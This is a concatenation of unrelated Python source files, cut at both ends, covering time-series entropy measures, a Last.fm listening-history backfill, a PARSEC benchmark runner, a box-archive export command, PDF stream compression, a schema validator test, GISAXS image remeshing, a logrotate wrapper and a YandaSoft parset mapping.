    # Work with m+1 so matches for both phi(m) and phi(m+1) accumulate in one pass.
    order += 1
    order_dbld = 2 * order
    # Define threshold
    # r *= x.std()
    # initialize the lists
    run = [0] * n                 # current run length per lag jj
    run1 = run[:]                 # run lengths carried over from the previous i
    r1 = [0] * (n * order_dbld)   # saved run history (kept for parity with the C original)
    a = [0] * order               # template matches per dimension (numerator counts)
    b = a[:]                      # matches excluding the last point (denominator counts)
    p = a[:]
    for i in range(n1):
        nj = n1 - i
        for jj in range(nj):
            j = jj + i + 1
            if abs(x[j] - x[i]) < r:
                # Extend the matching run at this lag; every dimension the
                # run currently covers gains one template match.
                run[jj] = run1[jj] + 1
                m1 = order if order < run[jj] else run[jj]
                for m in range(m1):
                    a[m] += 1
                    if j < n1:
                        b[m] += 1
            else:
                run[jj] = 0
        # Carry the run lengths over to the next outer iteration.
        for j in range(order_dbld):
            run1[j] = run[j]
            r1[i + n * j] = run[j]
        if nj > order_dbld - 1:
            for j in range(order_dbld, nj):
                run1[j] = run[j]
    # Shift b so that b[m] counts templates of length m; b[0] is the total
    # number of length-0 templates, i.e. the number of pairs n*(n-1)/2.
    m = order - 1
    while m > 0:
        b[m] = b[m - 1]
        m -= 1
    b[0] = n * n1 / 2
    a = np.array([float(aa) for aa in a])
    b = np.array([float(bb) for bb in b])
    p = np.true_divide(a, b)
    return -log(p[-1])
def app_entropy(x, order=2, metric='chebyshev'):
    """Approximate Entropy.

    Parameters
    ----------
    x : list or np.array
        One-dimensional time series of shape (n_times).
    order : int
        Embedding dimension. Default is 2.
    metric : str
        Name of the distance metric function used with
        :py:class:`sklearn.neighbors.KDTree`. Default is the
        `Chebyshev <https://en.wikipedia.org/wiki/Chebyshev_distance>`_
        distance.

    Returns
    -------
    ae : float
        Approximate Entropy.

    Notes
    -----
    Approximate entropy quantifies the amount of regularity and the
    unpredictability of fluctuations in a time series; smaller values
    indicate more regular, predictable data. The tolerance value
    (:math:`r`) is set to :math:`0.2 * \\text{std}(x)`.

    Code adapted from the `mne-features <https://mne.tools/mne-features/>`_
    package by Jean-Baptiste Schiratti and Alexandre Gramfort.

    References
    ----------
    Richman, J. S. et al. (2000). Physiological time-series analysis
    using approximate entropy and sample entropy. American Journal of
    Physiology-Heart and Circulatory Physiology, 278(6), H2039-H2049.

    Examples
    --------
    >>> from entropy import app_entropy
    >>> import numpy as np
    >>> np.random.seed(1234567)
    >>> x = np.random.rand(3000)
    >>> print(app_entropy(x, order=2))
    2.076046899582793
    """
    # ApEn is the difference between the two phi statistics.
    phi_m, phi_m1 = _app_samp_entropy(x, order=order, metric=metric,
                                      approximate=True)
    return np.subtract(phi_m, phi_m1)
def sample_entropy(x, order=2, metric='chebyshev'):
    """Sample Entropy.

    Parameters
    ----------
    x : list or np.array
        One-dimensional time series of shape (n_times).
    order : int
        Embedding dimension. Default is 2.
    metric : str
        Name of the distance metric function used with
        :py:class:`sklearn.neighbors.KDTree`. Default is the
        `Chebyshev <https://en.wikipedia.org/wiki/Chebyshev_distance>`_
        distance.

    Returns
    -------
    se : float
        Sample Entropy.

    Notes
    -----
    Sample entropy is a modification of approximate entropy used for
    assessing the complexity of physiological time-series. It is data-length
    independent and relatively trouble-free to implement. Large values
    indicate high complexity; smaller values characterize more self-similar
    and regular signals. It is defined as:

    .. math:: H(x, m, r) = -\\log\\frac{C(m + 1, r)}{C(m, r)}

    where :math:`m` is the embedding dimension (= order), :math:`r` is the
    radius of the neighbourhood (default :math:`0.2 * \\text{std}(x)`), and
    :math:`C(k, r)` counts embedded vectors of length :math:`k` within
    Chebyshev distance :math:`r` of each other.

    If ``metric == 'chebyshev'`` and ``len(x) < 5000``, a fast custom Numba
    implementation is used; otherwise the computation falls back to code
    from the `mne-features <https://mne.tools/mne-features/>`_ package by
    Jean-Baptiste Schiratti and Alexandre Gramfort (requires sklearn).

    References
    ----------
    Richman, J. S. et al. (2000). Physiological time-series analysis
    using approximate entropy and sample entropy. American Journal of
    Physiology-Heart and Circulatory Physiology, 278(6), H2039-H2049.

    Examples
    --------
    >>> from entropy import sample_entropy
    >>> import numpy as np
    >>> np.random.seed(1234567)
    >>> x = np.random.rand(3000)
    >>> print(sample_entropy(x, order=2))
    2.192416747827227
    >>> print(sample_entropy(x, order=3, metric='euclidean'))
    2.724354910127154
    """
    x = np.asarray(x, dtype=np.float64)
    # Fast Numba path only for the Chebyshev metric on short signals.
    use_fast_path = (metric == 'chebyshev' and x.size < 5000)
    if use_fast_path:
        return _numba_sampen(x, order=order, r=(0.2 * x.std(ddof=0)))
    phi = _app_samp_entropy(x, order=order, metric=metric,
                            approximate=False)
    return -np.log(np.divide(phi[1], phi[0]))
@jit('u8(unicode_type)', nopython=True)
def _lz_complexity(binary_string):
    """Internal Numba implementation of the Lempel-Ziv (LZ) complexity.
    https://github.com/Naereen/Lempel-Ziv_Complexity/blob/master/src/lziv_complexity.py

    Counts the number of components in the LZ76 factorisation in one scan.
    Pointers: u = start of the candidate earlier match, w = start of the
    component currently being built, v = current match length, v_max =
    longest match found for this component.
    """
    u, v, w = 0, 1, 1
    v_max = 1
    length = len(binary_string)
    complexity = 1
    while True:
        if binary_string[u + v - 1] == binary_string[w + v - 1]:
            # Character extends a match with earlier data: grow the match.
            v += 1
            if w + v >= length:
                # Reached the end mid-match: the tail is one final component.
                complexity += 1
                break
        else:
            v_max = max(v, v_max)
            u += 1
            if u == w:
                # Exhausted all earlier start positions: close this
                # component and start the next one after the longest match.
                complexity += 1
                w += v_max
                if w >= length:
                    break
                else:
                    # Reset the search for the new component.
                    u = 0
                    v = 1
                    v_max = 1
            else:
                # Try matching from the next earlier start position.
                v = 1
    return complexity
def lziv_complexity(sequence, normalize=False):
    """
    Lempel-Ziv (LZ) complexity of (binary) sequence.

    .. versionadded:: 0.1.1

    Parameters
    ----------
    sequence : str or array
        A sequence of character, e.g. ``'1001111011000010'``,
        ``[0, 1, 0, 1, 1]``, or ``'Hello World!'``.
    normalize : bool
        If ``True``, returns the normalized LZ (see Notes).

    Returns
    -------
    lz : int or float
        LZ complexity: the number of different substrings encountered as
        the stream is viewed from beginning to end. An integer (count)
        when ``normalize=False``, otherwise a float.

    Notes
    -----
    The raw LZ is heavily influenced by sequence length, so Zhang and
    colleagues (2009) proposed the normalized LZ:

    .. math:: \\text{LZn} = \\frac{\\text{LZ}}{(n / \\log_b{n})}

    where :math:`n` is the length of the sequence and :math:`b` the number
    of unique characters in the sequence.

    References
    ----------
    * Lempel, A., & Ziv, J. (1976). On the Complexity of Finite Sequences.
      IEEE Transactions on Information Theory, 22(1), 75-81.
      https://doi.org/10.1109/TIT.1976.1055501
    * Zhang, Y., Hao, J., Zhou, C., & Chang, K. (2009). Normalized
      Lempel-Ziv complexity and its application in bio-sequence analysis.
      Journal of Mathematical Chemistry, 46(4), 1203-1212.
      https://doi.org/10.1007/s10910-008-9512-2
    * https://en.wikipedia.org/wiki/Lempel-Ziv_complexity
    * https://github.com/Naereen/Lempel-Ziv_Complexity

    Examples
    --------
    >>> from entropy import lziv_complexity
    >>> s = '1001111011000010'
    >>> lziv_complexity(s)
    6
    >>> lziv_complexity([1, 0, 1, 0, 1, 0, 1, 0, 1, 0])
    3
    >>> lziv_complexity(s, normalize=True)
    1.5
    >>> s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    >>> lziv_complexity(s), lziv_complexity(s, normalize=True)
    (26, 1.0)
    >>> s = 'HELLO WORLD! HELLO WORLD! HELLO WORLD! HELLO WORLD!'
    >>> lziv_complexity(s), lziv_complexity(s, normalize=True)
    (11, 0.38596001132145313)
    """
    assert isinstance(sequence, (str, list, np.ndarray))
    assert isinstance(normalize, bool)
    if isinstance(sequence, str):
        s = sequence
    else:
        arr = np.asarray(sequence)
        if arr.dtype.kind in 'bfi':
            # Convert [True, False] or [1., 0.] to [1, 0]
            arr = arr.astype(int)
        # Flatten to a single string, e.g. "10001100"
        s = ''.join(arr.astype(str))
    if not normalize:
        return _lz_complexity(s)
    # Zhang et al. 2009 normalisation: LZ / (n / log_b(n)).
    # (Timmermann et al. 2019 instead divide by the LZ of a shuffled copy,
    # but that makes the result depend on the random seed, so it is not
    # used here.)
    n = len(s)
    base = len(''.join(set(s)))  # number of unique characters
    base = 2 if base < 2 else base
    return _lz_complexity(s) / (n / log(n, base))
|
#!/usr/bin/env python
import os
import logging
import pymongo
from datetime import datetime, timedelta
from pymongo import MongoClient
from recommender.infrastructure.lastfm import LastFMListeningRepository
from recommender.infrastructure.repository.mongodb import (
MongoDBTracksRepository
)
# Log level is configurable through the LOG_LEVEL environment variable.
logging.basicConfig(
    format='%(asctime)s - %(levelname)s - %(message)s',
    level=getattr(logging, os.getenv("LOG_LEVEL", "INFO"))
)
# Last.fm client credentials come from the environment; os.environ[...]
# fails fast with KeyError if any variable is missing.
listening_repo = LastFMListeningRepository(
    logging.getLogger(),
    os.environ["LASTFM_API_KEY"],
    os.environ["LASTFM_API_SECRET"],
    os.environ["LASTFM_USERNAME"],
    os.environ["LASTFM_PASSWORD"]
)
# Local MongoDB (default host/port), database "mgr", collection "playedtracks".
client = MongoClient()
db = client.mgr
tracks_repository = MongoDBTracksRepository(db.playedtracks)
# Backfill window (inclusive at both ends).
# START_TIME = datetime(2007, 7, 1)
START_TIME = datetime(2011, 3, 28)
END_TIME = datetime(2020, 3, 15)
if __name__ == "__main__":
    # Walk the window one day at a time, persisting every played track.
    day = START_TIME
    while day <= END_TIME:
        next_day = day + timedelta(days=1)
        tracks = listening_repo.get_tracks(time_from=day, time_to=next_day)
        day = next_day
        for t in tracks:
            logging.info(f"TRACK PLAYBACK: {t}")
            try:
                tracks_repository.save(t)
            except pymongo.errors.DuplicateKeyError as e:
                # Re-runs over the same window are expected; duplicates
                # (enforced by a unique index) are simply skipped.
                logging.warning(f"Ignoring duplicate record. {e}")
|
import sys, os, time, getopt, subprocess, tempfile
from parsec_platform import *
# Normalise a path to its absolute form.
abspath = lambda d: os.path.abspath(os.path.join(d))
# Directory containing this script; the parsec-2.1 tree lives beside it.
HOME = abspath(os.path.dirname(__file__))
# Lazily-populated cache used by allbenchmarks().
__allbenchmarks = None
def allbenchmarks():
    """Return the sorted list of PARSEC apps/kernels, or None on failure.

    Queries `parsecmgmt -a info` once and caches the result in the
    module-level __allbenchmarks variable.
    """
    global __allbenchmarks
    if not __allbenchmarks:
        try:
            output = subprocess.Popen(
                [ '%(HOME)s/parsec-2.1/bin/parsecmgmt' % globals(), '-a', 'info' ],
                stdout = subprocess.PIPE).communicate()[0]
            # Keep only the "[PARSEC] - <name> (apps|kernels)" lines.
            names = []
            for line in output.split('\n'):
                if line.startswith('[PARSEC] - ') and (line.endswith(' (apps)') or line.endswith(' (kernels)')):
                    names.append(line[15:].split(' ')[0])
            __allbenchmarks = sorted(names)
        except OSError:
            # parsecmgmt not installed / not executable.
            return None
    return __allbenchmarks
def allinputs():
    """Return the available input-set names (*.runconf files in the config dir)."""
    confdir = '%(HOME)s/parsec-2.1/config' % globals()
    suffix = '.runconf'
    return [ fname[:-len(suffix)] for fname in os.listdir(confdir) if fname.endswith(suffix) ]
def log2(n):
    """Return floor(log2(n)) for n >= 1; by construction returns -1 for n == 0."""
    result = -1
    while n:
        result += 1
        n >>= 1
    return result
class Program:
    """Wrapper around a PARSEC 2.1 benchmark run for this harness.

    Validates the (program, nthreads, inputsize, options) combination at
    construction time and launches the benchmark through parsecmgmt.
    NOTE: this file is Python 2 (see the `print` statement in run()), so
    `/` on integers below is floor division.
    """
    def __init__(self, program, nthreads, inputsize, benchmark_options = []):
        # NOTE(review): mutable default argument; appears safe because the
        # list is only read here, never mutated.
        if program not in allbenchmarks():
            raise ValueError("Invalid benchmark %s" % program)
        if inputsize not in allinputs():
            # Accept the short names small/medium/large as aliases for sim*.
            if inputsize in ('small', 'medium', 'large'):
                inputsize = 'sim' + inputsize
            else:
                raise ValueError("Invalid input size %s" % inputsize)
        self.program = program
        self.nthreads = int(nthreads)
        # force_nthreads bypasses the per-benchmark worker-count adjustment
        # performed in get_nthreads().
        self.nthreads_force = 'force_nthreads' in benchmark_options
        self.inputsize = inputsize
        if program in ('freqmine',):
            # freqmine is parallelized with OpenMP rather than pthreads.
            self.openmp = True
        else:
            self.openmp = False
        for option in benchmark_options:
            if option.startswith('pinthreads'):
                # pinthreads[=corelist]: pin worker threads via the PARMACS
                # hooks; default corelist is 0..nthreads-1.
                if '=' in option:
                    corelist = option.split('=')[1]
                else:
                    corelist = ','.join(map(str, range(nthreads)))
                os.environ['PARMACS_PINTHREADS'] = corelist
        # do the tests in self.nthreads, and fail early if we're called with an unsupported (program, nthreads, inputsize) combination
        nthreads = self.get_nthreads()
        # Check other constraints
        if self.program == 'facesim':
            # facesim only runs with a fixed set of thread counts.
            nthreads_supported = (1, 2, 3, 4, 6, 8, 16, 32, 64, 128)
            if nthreads not in nthreads_supported:
                raise ValueError("Benchmark %s only supports running with %s threads" % (self.program, nthreads_supported))
        elif self.program == 'fluidanimate':
            # nthreads must be power of two, one master thread will be added
            if nthreads != 1 << log2(nthreads):
                raise ValueError("Benchmark %s: number of threads must be power of two" % self.program)
    def get_nthreads(self):
        """Return the worker-thread count to pass to the benchmark.

        Most PARSEC applications spawn service threads (pipeline stages,
        master/IO threads) on top of the workers, so the worker count is
        derived from the requested core count self.nthreads. Raises
        ValueError if too few cores are available for the benchmark.
        """
        if self.nthreads_force:
            # Caller asked for the raw thread count, no adjustment.
            return self.nthreads
        if self.program == 'blackscholes':
            nthreads = self.nthreads - 1
        elif self.program == 'bodytrack':
            nthreads = self.nthreads - 2
        elif self.program == 'facesim':
            nthreads = self.nthreads
        elif self.program == 'ferret':
            # Four-stage parallel pipeline plus input/output threads
            # (Python 2 floor division).
            nthreads = (self.nthreads - 2) / 4
        elif self.program == 'fluidanimate':
            # nthreads must be power of two, one master thread will be added
            nthreads = 1 << log2(self.nthreads - 1)
        elif self.program == 'swaptions':
            nthreads = self.nthreads - 1
        elif self.program == 'canneal':
            nthreads = self.nthreads - 1
        elif self.program == 'raytrace':
            nthreads = self.nthreads - 1
        elif self.program == 'dedup':
            # dedup runs several equally-sized thread pools (floor division).
            nthreads = self.nthreads / 4
        elif self.program == 'streamcluster':
            nthreads = self.nthreads - 1
        elif self.program == 'vips':
            nthreads = self.nthreads - 2
        else:
            nthreads = self.nthreads
        if nthreads < 1:
            raise ValueError("Benchmark %s needs more cores" % self.program)
        return nthreads
    def run(self, graphitecmd, postcmd = ''):
        """Run the benchmark under `graphitecmd` via parsecmgmt.

        Returns the parsecmgmt exit code (1 immediately if a postcmd is
        given, which this backend does not support).
        """
        if postcmd != '':
            sys.stderr.write('PARSEC Error: postcmd not supported\n')
            return 1
        flags = []
        # Fresh scratch run directory, removed again at the end.
        rundir = tempfile.mkdtemp()
        if self.program == 'facesim':
            # Facesim needs a {rundir}/Storytelling/output directory and tries to create it with a system() call
            # -- which doesn't work under Graphite.
            # Therefore: set up the complete rundir ourselves, including input files and Storytelling/output
            inputfile = '%s/parsec-2.1/pkgs/apps/facesim/inputs/input_%s.tar' % (HOME, self.inputsize)
            if not os.path.exists(inputfile):
                print 'Cannot find input file %(inputfile)s' % locals()
                sys.exit(-1)
            # -k keeps the pre-populated run directory instead of recreating it.
            flags.append('-k')
            os.system('rm -r %(rundir)s/apps/facesim/run' % locals())
            os.system('mkdir -p %(rundir)s/apps/facesim/run/Storytelling/output' % locals())
            os.system('tar xvf %(inputfile)s -C %(rundir)s/apps/facesim/run' % locals())
        if self.openmp:
            # OpenMP benchmarks read their thread count from the environment.
            os.putenv('OMP_NUM_THREADS', str(self.get_nthreads()))
        proc = subprocess.Popen([ '%s/parsec-2.1/bin/parsecmgmt' % HOME,
            '-a', 'run', '-p', self.program, '-c', PLATFORM, '-i', self.inputsize, '-n', str(self.get_nthreads()),
            '-s', graphitecmd, '-d', rundir
            ] + flags)
        proc.communicate()
        os.system('rm -r %(rundir)s' % locals())
        return proc.returncode
    def rungraphiteoptions(self):
        """No extra Graphite options are required for PARSEC."""
        return ''
|
#Copyright (C) 2016 Zumium martin007323@gmail.com
#
#
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
from boxes import handlerBase
class ExportHandler(handlerBase.BaseHandler):
    """Handler for `boxes export BOX [/path/to/put/archivefile]`.

    Exports a box either by archiving its directory into a new tar file
    (unarchived boxes) or by copying the already-existing archive file
    (archived boxes) to the destination directory.
    """
    def __init__(self):
        super().__init__()
    def handle(self):
        """Validate the parsed CLI arguments and export the requested box."""
        import tarfile
        import shutil
        import os
        import os.path
        #check number of arguments: BOX plus an optional destination path
        if self.argumentNum ==0 or self.argumentNum > 2:
            print('usage: boxes export BOX [/path/to/put/archivefile]')
            return
        #check argument type
        if self.arguments[0]['type'] != 'box':
            print('usage: boxes export BOX [/path/to/put/archivefile]')
            return
        if self.argumentNum == 2:
            if self.arguments[1]['type'] != 'path':
                print('usage: boxes export BOX [/path/to/put/archivefile]')
                return
        else:
            #no destination given: default to the current working directory
            self.arguments.append({'type':'path','path':os.getcwd()})
        #get absolute path
        self.arguments[1]['path']=os.path.abspath(self.arguments[1]['path'])
        #check whether the box exists in either live or archived form
        boxName=self.arguments[0]['box']
        if not (self.checkBoxExists(boxName) or self.checkArchivedBoxExists(boxName)):
            print('box {} doesn\'t exist'.format(boxName))
            return
        #figure out whether it is archived or unarchived
        isUnarchived=self.checkBoxExists(boxName)
        pathToCopyAt=self.arguments[1]['path']
        #add trailing separator so the archive filename can be appended directly
        if pathToCopyAt[-1] != self.pathSeperator:
            pathToCopyAt+=self.pathSeperator
        #start to export
        if isUnarchived:
            #unarchived: pack the box directory into a new compressed tar file
            boxTarFile=tarfile.open(pathToCopyAt+boxName+self.archiveTail,'w:'+self.compressType)
            #backup current working directory so it can be restored afterwards
            preCwd=os.getcwd()
            #change to the boxes' parent directory so archive members get relative paths
            os.chdir(self.getFullBoxPath(''))
            #add box folder to tarfile
            boxTarFile.add(boxName)
            #close tarfile
            boxTarFile.close()
            #change current working directory back
            os.chdir(preCwd)
        else:
            #archived: the archive file already exists, copy it directly out
            shutil.copy(self.getFullArchivedBoxPath(boxName),pathToCopyAt)
|
# A part of pdfrw (https://github.com/pmaupin/pdfrw)
# Copyright (C) 2006-2015 Patrick Maupin, Austin, Texas
# MIT license -- See LICENSE.txt for details
'''
Currently, this sad little file only knows how to compress
using the flate (zlib) algorithm. Maybe more later, but it's
not a priority for me...
'''
from .objects import PdfName
from .uncompress import streamobjects
from .py23_diffs import zlib, convert_load, convert_store
def compress(mylist):
    """Flate-compress every unfiltered stream object in mylist.

    Objects that already carry a Filter are left untouched. A compressed
    stream is only installed when it is not more than 30 bytes larger
    than the original; DecodeParms is cleared alongside the new filter.
    """
    flate = PdfName.FlateDecode
    for obj in streamobjects(mylist):
        if obj.Filter is not None:
            # Already encoded somehow -- do not double-encode.
            continue
        original = obj.stream
        packed = convert_load(zlib.compress(convert_store(original)))
        if len(packed) < len(original) + 30:
            obj.stream = packed
            obj.Filter = flate
            obj.DecodeParms = None
|
from app.validators.blocks.unrelated_block_validator import UnrelatedBlockValidator
from app.validators.questionnaire_schema import QuestionnaireSchema
from tests.test_questionnaire_validator import _open_and_load_schema_file
def test_invalid_actions():
    """The unrelated block without action params yields ACTION_PARAMS_MISSING."""
    schema = QuestionnaireSchema(_open_and_load_schema_file(
        "schemas/invalid/test_invalid_relationships_unrelated.json"))
    unrelated_block = schema.get_block("relationships").get("unrelated_block")
    validator = UnrelatedBlockValidator(unrelated_block, schema)
    validator.validate()
    assert validator.errors == [
        {
            "message": validator.ACTION_PARAMS_MISSING,
            "block_id": "related-to-anyone-else",
        }
    ]
|
from xicam.plugins.operationplugin import operation, output_names, display_name, describe_input, describe_output, \
categories, plot_hint
import numpy as np
import pyFAI
import hipies
@operation
@display_name('Remesh')
@describe_input('data', 'Detector image')
@describe_input('geometry', 'pyFAI Geometry')
@describe_input('alpha_in', 'GISAXS incidence angle')
@describe_input('out_range', 'coordinates of output image')
@describe_input('resolution', 'resolution of output image')
@describe_input('coord_sys', 'Choice of coordinate system for output image')
@output_names('I', 'x', 'y', 'geometry')
@describe_output('I', 'remapped image')
@describe_output('x', 'X-coordinates output image')
@describe_output('y', 'Y-coordinates output image')
@describe_output('geometry', 'pyFAI geometry')
def image_remap(data: np.ndarray,
                geometry: pyFAI.geometry.Geometry,
                alpha_in: float,
                out_range: list = None,
                resolution: list = None,
                coord_sys: str = 'qp_qz') -> np.ndarray:
    """Remesh a GISAXS detector image into the requested coordinate system.

    Delegates the remapping to hipies.remesh, then updates the pyFAI
    geometry's Fit2D centre to the remeshed origin and returns the
    remapped intensity, the output coordinate arrays and the geometry.
    """
    I, x, y = hipies.remesh(data, geometry, alpha_in, out_range=out_range,
                            res=resolution, coord_sys=coord_sys)
    # Pixel indices closest to the coordinate origin along each output axis.
    # (was x.abs()/y.abs(): np.ndarray has no .abs() method, which would
    # raise AttributeError at runtime)
    centerX = np.unravel_index(np.abs(x).argmin(), x.shape)[1]
    centerY = np.unravel_index(np.abs(y).argmin(), y.shape)[0]
    pixel = [geometry.get_pixel1(), geometry.get_pixel2()]
    # Fixed the unbalanced bracket '[ ... )' of the original (SyntaxError).
    # NOTE(review): the centre is scaled to metres here although pyFAI's
    # setFit2D documents pixel-unit centre arguments -- preserved from the
    # original; confirm the intended units.
    center = [centerX * pixel[0], centerY * pixel[1]]
    geometry.setFit2D(geometry._dist, center[0], center[1])
    return I, x, y, geometry
|
from JumpScale import j
class LogRotate(object):
    """Minimal service wrapper that triggers logrotate on demand.

    Only start() performs work; logrotate is a one-shot command, so
    stop/restart/status are intentionally no-ops.
    """
    def start(self):
        # Run logrotate over every configuration under /etc/logrotate.d.
        j.system.process.execute('logrotate /etc/logrotate.d/*')
    def stop(self):
        # Nothing to stop: logrotate exits on its own.
        pass
    def restart(self):
        pass
    def status(self):
        pass
|
"""
This module is a wrapper around parsets used in YandaSoft.
The code takes template parset(s) and creates custom parsets for pipelines such as the gridded DINGO pipeline.
Currently not everything is supported and the wrapper is not complete, i.e. the user can break the wrapper if not careful!
"""
# Public API of this module.
# NOTE(review): 'check_preconditioner_suppoort' is misspelled but must match
# the actual function name defined elsewhere -- confirm before correcting.
__all__ = ['list_supported_parset_settings', 'create_parset_mapping',
        'check_preconditioner_suppoort', 'check_parameter_and_Imager_compatibility',
        'check_parameter_and_Preconditioner_compatibility',
        'check_parameter_and_Gridder_compatibility', 'Parset']
import os
import logging
#=== Setup logging ===
log = logging.getLogger(__name__)
#=== Globals ===
# NOTE(review): `global` statements at module scope are no-ops -- the
# assignments below create module-level names regardless. Kept as-is.
global _SUPPORTED_IMAGERS
global _SUPPORTED_SOLVERS
global _SUPPORTED_GRIDDER_NAMES
global _SUPPORTED_PRECONDITIONERS
# Settings the dstack wrapper accepts when building YandaSoft parsets.
_SUPPORTED_IMAGERS = ['Cimager', 'Cdeconvolver', 'dstack']
_SUPPORTED_SOLVERS = ['Clean']
_SUPPORTED_GRIDDER_NAMES = ['Box', 'SphFunc', 'WStack', 'WProject']
_SUPPORTED_PRECONDITIONERS = ['Wiener','GaussianTaper']
#Some default parameters
global _DEFAULT_IMAGER
global _DEFAULT_IMAGE_NAMES
global _DEFAULT_GRIDDER_NAME
global _DEFAULT_PRECONDITIONER
_DEFAULT_IMAGER = 'Cimager'
_DEFAULT_IMAGE_NAMES = 'image.dstack.test'
_DEFAULT_GRIDDER_NAME = 'WProject'
_DEFAULT_PRECONDITIONER = []
#Globals defining the compatibility of different Preconditioners
global _FORBIDDEN_WITH_NO_PRECONDITIONING
global _WIENER_FORBIDDEN_PARAMS
global _GAUSSIANTAPER_FORBIDDEN_PARAMS
# Parameters that are invalid when no preconditioner is configured, or when
# a specific preconditioner (Wiener / GaussianTaper) is not selected.
_FORBIDDEN_WITH_NO_PRECONDITIONING = ['Preservecf', 'PGaussianTaper']
_WIENER_FORBIDDEN_PARAMS = ['PWnoisepower', 'PWnormalise', 'PWrobustness', 'PWtaper']
_GAUSSIANTAPER_FORBIDDEN_PARAMS = ['PGTisPsfSize', 'PGTtolerance']
#Globals defining the compatibility of different gridders
global _COPLANAR_FORBIDDEN_PARAMS
global _NON_ANTIALIASING_FORBIDDEN_PARAMS
#Forbidden for gridders not taking the w-term into account
#Basically everything except WProject and WStack (currently including parameters supporting Non-linear sampling in w-space)
_COPLANAR_FORBIDDEN_PARAMS = ['GNwmax', 'GNwmaxclip', 'GNnwplanes', 'GNwstats', 'GNwsampling', 'GNWexponent', 'GNWnwplanes50',
                            'GNWexport', 'GNcutoff', 'GNCabsolute', 'GNoversample', 'GNmaxsupport', 'GNlimitsupport',
                            'GNvariablesupport', 'GNoffsetsupport', 'GNtablename', 'GNusedouble', 'GNsharecf']
_NON_ANTIALIASING_FORBIDDEN_PARAMS = ['GNalpha'] #Forbidden params for everything except SphFunc and WProject
#=== Functions ===
def list_supported_parset_settings():
    """Log, at INFO level, the YandaSoft parset settings supported by dstack.

    Parameters
    ==========
    Returns
    =======
    Prints out the supported settings: log
    """
    log.info('Settings for YandaSoft parsets supported by the dstack wrapper:')
    for functionality, flist in (('Imagers', _SUPPORTED_IMAGERS),
                                 ('Solvers', _SUPPORTED_SOLVERS),
                                 ('Gridders', _SUPPORTED_GRIDDER_NAMES),
                                 ('Preconditioners', _SUPPORTED_PRECONDITIONERS)):
        log.info('Supported {0:s}: '.format(functionality) + ' '.join(map(str, flist)))
def create_parset_mapping(image_names=_DEFAULT_IMAGE_NAMES, gridder_name=_DEFAULT_GRIDDER_NAME):
    """This function creates a mapping between the ``dstack`` and ``YandaSoft`` parset variables.
    The imager used is not included in the ``YandaSoft`` variables. However, when reading in a template parset
    using the ``__init__()`` method of the Parset class, the imager name has to be included in the parset file.
    This solution gives more flexibility with reading and creating parsets. The list of supported imagers:
    - Cimager
    - Cdeconvolver
    And for reading the template parset, a special imager name is allowed: dstack (not allowed for creating parsets)
    This function however, just defines the mapping between ``dstack`` and ``YandaSoft`` and thus can be used to
    overwrite an existing mapping of a ``Parset``. This is useful when a ``Parset`` has already been created from a template,
    but we want to modify some values and create a parset that uses a different imager.
    Currently not all parset parameters are supported.
    e.g. only the Clean solvers are supported in the current version of ``dstack``
    The mapping uses the ``Python 3.7+`` feature that dictionaries are ordered by insertion.
    I.e. the mapping is sorted as it is hard-coded in this function!
    Parameters
    ==========
    image_names: str, optional
        The ``Names`` parameter of ``YandaSoft`` imager task. The code *currently does not support a list of Names, only a single Name can be used*!
    gridder_name: str, optional
        The ``gridder`` parameter of ``YandaSoft`` imager task.
    Returns
    =======
    parset_mapping: dict
        The dictionary that is the mapping between the ``dstack`` and ``YandaSoft`` parset variables
    inverse_parset_mapping: dict
        Inverse dictionary of ``parset_mapping``
    """
    parset_mapping = {
        #Basic parameters
        'dataset': 'dataset',
        'grid': 'grid',
        'psfgrid': 'psfgrid',
        'pcf': 'pcf',
        'imagetype': 'imagetype',
        'nworkergroups': 'nworkergroups',
        'nchanpercore': 'nchanpercore',
        'Channels': 'Channels',
        'Frequencies': 'Frequencies',
        'beams': 'beams',
        'nwriters': 'nwriters',
        'freqframe': 'freqframe',
        'singleoutputfile': 'singleoutputfile',
        'solverpercore': 'solverpercore',
        'datacolumn': 'datacolumn',
        'sphfuncforpsf': 'sphfuncforpsf',
        'calibrate': 'calibrate',
        'Cscalenoise': 'calibrate.scalenoise',
        'Callowflag': 'calibrate.allowflag',
        'Cignorebeam': 'calibrate.ignorebeam',
        'gainsfile': 'gainsfile',
        'residuals': 'residuals',
        'restore': 'restore',
        'nUVWMachines': 'nUVWMachines',
        'uvwMachineDirTolerance': 'uvwMachineDirTolerance',
        'MaxUV': 'MaxUV',
        'MinUV': 'MinUV',
        'usetmpfs': 'usetmpfs',
        'tmpfs': 'tmpfs',
        'rankstoringcf': 'rankstoringcf',
        'visweights': 'visweights',
        'VMFSreffreq': 'visweights.MFS.reffreq',
        'ncycles': 'ncycles',
        'sensitivityimage': 'sensitivityimage',
        'Scutoff': 'sensitivityimage.cutoff',
        'channeltolerance': 'channeltolerance',
        'dumpgrids': 'dumpgrids',
        'memorybuffers': 'memorybuffers',
        #Images settings
        'Ireuse': 'Images.reuse',
        'Ishape': 'Images.shape',
        'Idirection': 'Images.direction',
        'Icellsize': 'Images.cellsize',
        'IwriteAtMajorCycle': 'Images.writeAtMajorCycle',
        'IrestFrequency': 'Images.restFrequency',
        'INames': 'Images.Names',
        #Per-image parameters: the single image name is baked into the key
        'INnchan': 'Images.{0:s}.nchan'.format(image_names),
        'INfrequency': 'Images.{0:s}.frequency'.format(image_names),
        'INdirection': 'Images.{0:s}.direction'.format(image_names),
        'INtangent': 'Images.{0:s}.tangent'.format(image_names),
        'INewprojection': 'Images.{0:s}.ewprojection'.format(image_names),
        'INshape': 'Images.{0:s}.shape'.format(image_names),
        'INcellsize': 'Images.{0:s}.cellsize'.format(image_names),
        'INnfacets': 'Images.{0:s}.nfacets'.format(image_names),
        'INpolarisation': 'Images.{0:s}.polarisation'.format(image_names),
        'INnterms': 'Images.{0:s}.nterms'.format(image_names),
        'INfacetstep': 'Images.{0:s}.facetstep'.format(image_names),
        #Gridding setup
        'gridder': 'gridder',
        'Gpadding': 'gridder.padding',
